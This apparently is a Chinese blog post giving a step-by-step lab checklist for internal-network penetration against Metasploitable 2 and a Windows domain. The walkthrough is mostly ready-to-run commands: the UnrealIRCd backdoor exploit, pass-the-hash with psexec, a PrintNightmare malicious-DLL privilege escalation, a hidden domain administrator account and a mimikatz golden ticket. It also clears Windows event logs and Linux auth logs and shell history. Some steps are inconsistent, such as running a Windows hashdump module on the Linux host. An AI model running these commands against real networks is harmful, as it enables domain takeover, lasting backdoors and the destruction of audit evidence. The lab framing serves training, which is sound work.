news 2026/4/4 1:46:26

内网渗透靶场实操清单(基于 Vulhub+Metasploitable 2)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
内网渗透靶场实操清单(基于 Vulhub+Metasploitable 2)

本清单以“外网突破→内网信息收集→横向移动→权限提升→持久化”为核心流程,使用 Kali Linux 作为攻击机,Metasploitable 2(Linux 靶机)+ Vulhub Windows 域环境靶机作为目标,全程手把手指导。

一、 靶场环境搭建

1. 基础环境准备

设备系统版本IP 规划(建议同一内网段)核心作用
攻击机Kali Linux 2025192.168.56.101执行扫描、漏洞利用、横向移动
外网跳板机Metasploitable 2192.168.56.102模拟外网 Web 服务器,作为内网入口
内网域靶机Windows Server 2019(AD)192.168.56.103域控制器(DC),域名为test.com
内网普通主机Windows 10192.168.56.104域内普通主机,加入test.com

2. 环境配置步骤

  1. 虚拟机网络设置:所有设备均设置为Host-Only 模式,确保处于同一内网段,且攻击机能访问所有靶机。
  2. Metasploitable 2 部署
    • 下载镜像:Metasploitable 2 官方镜像
    • 虚拟机导入后,默认账户密码:msfadmin/msfadmin
  3. Windows 域环境部署(Vulhub 快捷方式)
    • 克隆 Vulhub 仓库:git clone https://github.com/vulhub/vulhub.git
    • 进入 Windows 域环境目录(如vulhub/windows/ad
    • 启动靶机:docker-compose up -d
    • 注意:Vulhub 域靶机默认开启 WinRM、SMB 服务,方便后续渗透。

二、 实操步骤(完整流程)

阶段 1:外网突破 - 获取跳板机(Metasploitable 2)权限

  1. 端口扫描与漏洞发现
    • 攻击机执行 nmap 扫描:nmap -sV -p- 192.168.56.102
    • 发现开放端口:21(FTP)、22(SSH)、80(HTTP)、3306(MySQL)等,且存在UnrealIRCd 后门漏洞(经典漏洞)。
  2. 漏洞利用 - 获取 Meterpreter 会话
    • 启动 msfconsole:msfconsole
    • 搜索漏洞模块:search unrealircd
    • 加载模块:use exploit/unix/irc/unrealircd_3281_backdoor
    • 设置目标 IP:set RHOSTS 192.168.56.102
    • 执行攻击:run
    • 成功获取meterpreter 会话,当前权限为msfadmin

阶段 2:内网信息收集(从跳板机探测内网)

  1. 跳板机内网网段探测
    • 在 meterpreter 中执行:ipconfig,发现跳板机内网网卡 IP 为192.168.56.102,推测内网段为192.168.56.0/24
    • 执行内网存活主机扫描:run post/multi/gather/ping_sweep RHOSTS=192.168.56.0/24
    • 发现存活主机:192.168.56.103(DC)、192.168.56.104(Windows 10)。
  2. 端口与服务探测
    • 对 DC 进行端口扫描:run auxiliary/scanner/portscan/tcp RHOSTS=192.168.56.103 PORTS=135,139,445,389
    • 发现 DC 开放 445(SMB)、389(LDAP)端口,确认是域控制器。
  3. 域环境信息收集
    • 切换到跳板机 shell:shell
    • 安装 impacket 工具(Kali 已预装),执行域用户查询:

      bash

      运行

      python3 /usr/share/doc/python3-impacket/examples/net.py user /domain -target-ip 192.168.56.103
    • 成功获取域用户列表:administratoruser1等。

阶段 3:横向移动 - 从跳板机到内网 Windows 10 主机

  1. 凭证获取(跳板机本地哈希提取)
    • 回到 meterpreter 会话,执行哈希提取:run post/windows/gather/hashdump
    • 若跳板机是 Linux,改用linpeas.sh提取凭证:

      bash

      运行

      wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh chmod +x linpeas.sh ./linpeas.sh
    • 假设获取到域用户user1的 NTLM 哈希:aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef
  2. 哈希传递攻击(PTH)
    • 使用 impacket 的 psexec.py 执行横向移动:

      bash

      运行

      python3 /usr/share/doc/python3-impacket/examples/psexec.py test.com/user1@192.168.56.104 -hashes aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef
    • 成功获取 Windows 10 主机的system 权限 shell

阶段 4:权限提升 - 从域用户到域管理员

  1. 域内信息收集(Windows 10 主机)
    • 在 shell 中执行域管理员查询:net group "Domain Admins" /domain
    • 发现域管理员账户:administrator
  2. 利用 PrintNightmare 漏洞提权(假设 DC 未打补丁)
    • 攻击机下载 PrintNightmare 利用脚本:git clone https://github.com/cube0x0/CVE-2021-34527.git
    • 编译脚本后,通过 smb 共享传输到 Windows 10 主机:

      bash

      运行

      impacket-smbserver share . -smb2support
    • Windows 10 主机挂载共享:net use \\192.168.56.101\share
    • 执行提权脚本:CVE-2021-34527.exe \\192.168.56.101\share\malicious.dll
    • 成功获取域管理员权限

阶段 5:持久化 - 域内留后门

  1. 创建隐藏域管理员账户
    • 在 DC 中执行命令:

      cmd

      net user hidden_admin P@ssw0rd! /add /domain net group "Domain Admins" hidden_admin /add /domain
  2. 黄金票据生成
    • 使用 mimikatz 提取域控制器的 KRBTGT 账户哈希:

      bash

      运行

      mimikatz.exe "lsadump::lsa /inject /name:krbtgt" exit
    • 生成黄金票据:

      bash

      运行

      mimikatz.exe "kerberos::golden /domain:test.com /sid:S-1-5-21-xxxxxx /krbtgt:哈希值 /user:backdoor /ptt" exit
    • 利用黄金票据可长期控制整个域,无需再次破解密码。

阶段 6:痕迹清理

  1. Windows 日志清理
    • 执行命令删除事件日志:

      cmd

      wevtutil cl System wevtutil cl Security wevtutil cl Application
  2. Linux 日志清理
    • 清空跳板机日志:

      bash

      运行

      echo "" > /var/log/auth.log echo "" > /var/log/syslog history -c && history -w

三、 靶场实操注意事项

  1. 环境隔离:所有操作必须在独立虚拟机环境中进行,禁止接入公网。
  2. 工具版本:确保 Kali 工具为最新版,执行apt update && apt upgrade升级。
  3. 权限授权:本清单仅用于合法渗透测试学习,必须获得靶机授权
  4. 排错技巧:若攻击失败,优先检查网络连通性、靶机补丁状态、工具参数是否正确。
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/3/28 18:12:30

智慧校园建设新思路:用数据中台破解信息孤岛困局

✅作者简介:合肥自友科技 📌核心产品:智慧校园平台(包括教工管理、学工管理、教务管理、考务管理、后勤管理、德育管理、资产管理、公寓管理、实习管理、就业管理、离校管理、科研平台、档案管理、学生平台等26个子平台) 。公司所有人员均有多…

作者头像 李华
网站建设 2026/4/3 2:09:30

CK-Pan抗体在细胞生物学研究中有何关键作用?

一、为何说CK-Pan抗体是细胞骨架研究的重要工具?细胞角蛋白(Cytokeratin)作为中间丝蛋白家族的重要成员,是上皮细胞骨架的核心构成部分。CK-Pan抗体作为一种广谱检测工具,能够特异性识别多种酸性(Type I&am…

作者头像 李华
网站建设 2026/3/31 20:38:30

Flutter Admin后台管理系统:零基础搭建企业级管理平台完整指南

Flutter Admin后台管理系统:零基础搭建企业级管理平台完整指南 【免费下载链接】flutter_admin Flutter Admin: 一个基于 Flutter 的后台管理系统、开发模板。A backend management system and development template based on Flutter 项目地址: https://gitcode.…

作者头像 李华
网站建设 2026/3/29 15:09:41

DotnetSpider:构建企业级.NET数据采集系统的终极指南

DotnetSpider:构建企业级.NET数据采集系统的终极指南 【免费下载链接】DotnetSpider 项目地址: https://gitcode.com/gh_mirrors/dot/DotnetSpider 在数字化转型的浪潮中,数据已成为驱动业务增长的核心引擎。然而,面对复杂的网络环境…

作者头像 李华
网站建设 2026/3/13 22:40:07

实战指南:YOLO模型在A800 GPU上的性能优化与部署策略

实战指南:YOLO模型在A800 GPU上的性能优化与部署策略 【免费下载链接】ultralytics ultralytics - 提供 YOLOv8 模型,用于目标检测、图像分割、姿态估计和图像分类,适合机器学习和计算机视觉领域的开发者。 项目地址: https://gitcode.com/…

作者头像 李华
网站建设 2026/4/3 4:47:57

面对AIGC检测新挑战,十款智能优化工具深度测评

随着AIGC检测日益成为学术写作的关键关卡,如何有效降低论文中的AI痕迹,成为众多学子关注的焦点。市场上的降AI率工具层出不穷,承诺各异,但实际效果如何?以下是对十款主流工具的深度分析。01 SpeedAI科研助手&#xff1…

作者头像 李华